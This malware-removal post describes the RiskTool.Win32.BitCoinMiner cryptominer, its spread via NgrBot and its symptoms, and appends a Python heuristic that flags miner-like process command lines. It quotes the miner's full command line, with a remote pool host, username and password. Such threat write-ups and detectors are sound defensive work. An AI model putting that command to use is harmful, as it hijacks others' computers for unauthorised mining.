RiskTool.Win32.BitCoinMiner is a risk tool or potentially unwanted application that may use your computer's resources to generate bitcoin blocks and send them to a remote location. What is bitcoin? Bitcoins are a virtual currency. Anyone who has a computer with a high-end graphics card and internet access can generate bitcoins and then sell the coins in exchange for a hard currency. The current US dollar-to-bitcoin rate at the time of writing is $5.62 per bitcoin according to mtgox.com. However, exchange rates may vary daily. The average value of one bitcoin was $29 back in June 2011. Join any Bitcoin network you like, acquire a bitcoin wallet, install a mining client and you are ready to go. It's free and legal.
Why, then, is it considered a risk tool? Malware authors are infecting computer systems with powerful GPUs to make easy money. They are using your precious GPU and CPU resources to generate bitcoins without your consent. Let's say you have a graphics card worth $140. In the best-case scenario, depending on the difficulty factor and other variables, cyber crooks can generate bitcoins worth around $150 per month. Combined with thousands of other infected computers, cyber crooks can expect to earn some serious cash.
RiskTool.Win32.BitCoinMiner is distributed through drive-by downloads, social networks, instant messengers and removable drives. The bitcoin mining module can also be downloaded by the NgrBot. This bot determines GeoIP details, downloads additional modules from the Internet and kills all previous bitcoin mining processes. It has spyware modules as well.
Symptoms of RiskTool.Win32.BitCoinMiner infection:
High CPU usage. BitCoinMiner uses the computer's CPU resources very intensively by performing highly complex computations. It's a very time-consuming process, so malware authors decided to generate bitcoins by leveraging the CPU cycles of infected machines, which makes an infected computer run very slowly. By the way, the NgrBot attempts to load nvcuda.dll, if present, to mine bitcoins using the GPU.
Suspicious network activity. More packets are sent than received.
Active connections to specific servers. It mines for bitcoins at one-minute intervals by executing the following command:
hehe.exe -a 60 -g yes -o http://hdzx.aquarium-stakany.com:8332/ -u darkSons_crypt -p blabblabla -t 2
RiskTool.Win32.BitCoinMiner is added to the list of startup programs. The risk tool also changes the Windows registry so that it runs every time Windows starts.
RiskTool.Win32.BitCoinMiner can infect USB pen drives and other removable media. Don't use a USB pen drive while your computer is infected with this malware.
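As an added example (not part of the original write-up or of any anti-malware product), the Python code below checks process command lines for the argument shape of the command quoted above: an -o URL on port 8332 combined with -u/-p, -t or -g options, regardless of the executable's name. The process records, the second host name and all function and indicator names are constructed for illustration.

```python
import shlex
from urllib.parse import urlsplit

BITCOIN_RPC_PORT = 8332  # default Bitcoin JSON-RPC port, as in the pool URL quoted above

def parse_options(cmdline):
    """Return {flag: value} for '-x value' style arguments after the image name."""
    try:
        tokens = shlex.split(cmdline, posix=False)  # keep Windows backslashes intact
    except ValueError:                              # unbalanced quotes in the log line
        tokens = cmdline.split()
    tokens = [t.strip('"') for t in tokens]
    opts = {}
    for flag, value in zip(tokens[1:], tokens[2:]):
        if flag.startswith("-") and not value.startswith("-"):
            opts.setdefault(flag, value)
    return opts

def miner_indicators(cmdline):
    """List which traits of the quoted miner invocation this command line shares."""
    opts = parse_options(cmdline)
    hits = []
    try:
        url = urlsplit(opts.get("-o", ""))
        if url.scheme in ("http", "https") and url.port == BITCOIN_RPC_PORT:
            hits.append("o-url-8332")
    except ValueError:                              # malformed host or port in the URL
        pass
    if "-u" in opts and "-p" in opts:
        hits.append("u-p-pair")
    if opts.get("-t", "").isdigit():
        hits.append("t-number")
    if opts.get("-g", "").lower() == "yes":
        hits.append("g-yes")
    return hits

def is_miner_like(cmdline):
    # Require the port-8332 URL plus two more traits; the file name is ignored.
    hits = miner_indicators(cmdline)
    return "o-url-8332" in hits and len(hits) >= 3

SAMPLE_PROCESSES = [  # constructed (pid, command line) records; pid 1204 uses the command from the page
    (1204, "hehe.exe -a 60 -g yes -o http://hdzx.aquarium-stakany.com:8332/ -u darkSons_crypt -p blabblabla -t 2"),
    (2310, '"C:\\Users\\Public\\svcupd.exe" -t 4 -o http://pool.example.invalid:8332/ -p x -u worker1'),
    (3188, "curl.exe -o report.html -u alice http://intranet.example.invalid:8080/"),
    (4022, "ping.exe -t 10.0.0.5"),
]

def flagged_pids(processes):
    return [pid for pid, cmdline in processes if is_miner_like(cmdline)]
```

Run over the constructed records, flagged_pids(SAMPLE_PROCESSES) reports pids 1204 and 2310 and leaves the curl and ping lines alone, since their -o and -t values do not match the shape.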
There's a great chance it came bundled with other malicious software. If you got infected with this risk tool, please scan your computer with anti-malware software. If you have any questions, please leave a comment. Good luck and be safe online!
Download recommended anti-malware software and run a full system scan. It will detect and remove this infection from your computer.